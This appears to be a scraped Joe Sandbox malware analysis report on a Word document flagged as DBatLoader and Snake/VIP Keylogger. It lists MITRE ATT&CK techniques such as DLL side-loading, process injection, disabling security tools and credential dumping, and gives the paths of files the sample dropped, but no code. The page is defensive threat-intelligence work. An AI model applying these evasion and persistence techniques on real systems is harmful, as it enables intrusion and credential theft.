Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PI ITS15235.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\Nsltarpn

C:\Users\Public\Libraries\Nsltarpn.PIF

C:\Users\Public\Libraries\YKA

C:\Users\Public\Libraries\npratlsN.pif

C:\Users\Public\Nsltarpn.url

C:\Users\Public\NsltarpnF.cmd

C:\Users\user\AppData\Local\Temp\~DF4C5EFADB8A33A5FF.TMP

Windows Analysis Report
PI ITS15235.doc

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre